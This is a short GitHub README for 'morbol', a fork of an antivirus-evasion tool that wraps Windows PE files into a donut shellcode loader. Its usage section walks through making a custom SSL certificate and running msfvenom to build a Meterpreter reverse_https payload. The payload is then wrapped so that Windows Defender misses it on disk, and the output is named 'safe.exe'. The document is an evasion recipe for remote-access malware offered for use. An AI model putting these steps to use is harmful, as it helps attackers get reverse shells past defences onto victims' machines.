forked from xct/morbol

Simple AV Evasion for PE Files

s1im3r00/morbol
Morbol

Wraps PE Files (PIE required) into a shellcode loader via donut. This mainly evades detection on disk.

Setup

pip3 install donut-shellcode
sudo apt-get install upx

Usage

In my experience the only reliable way to evade Defender with Meterpreter is to use a reverse_https payload with a custom cert.

  • Modify /etc/ssl/openssl.cnf so that CipherString = DEFAULT
  • openssl req -new -x509 -nodes -out cert.crt -keyout priv.key
  • set HandlerSSLCert on the server side listener
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=... LPORT=... HandlerSSLCert=... -f exe > msf.exe
python3 morbol.py msf.exe safe.exe

Credit

Heavily based on:
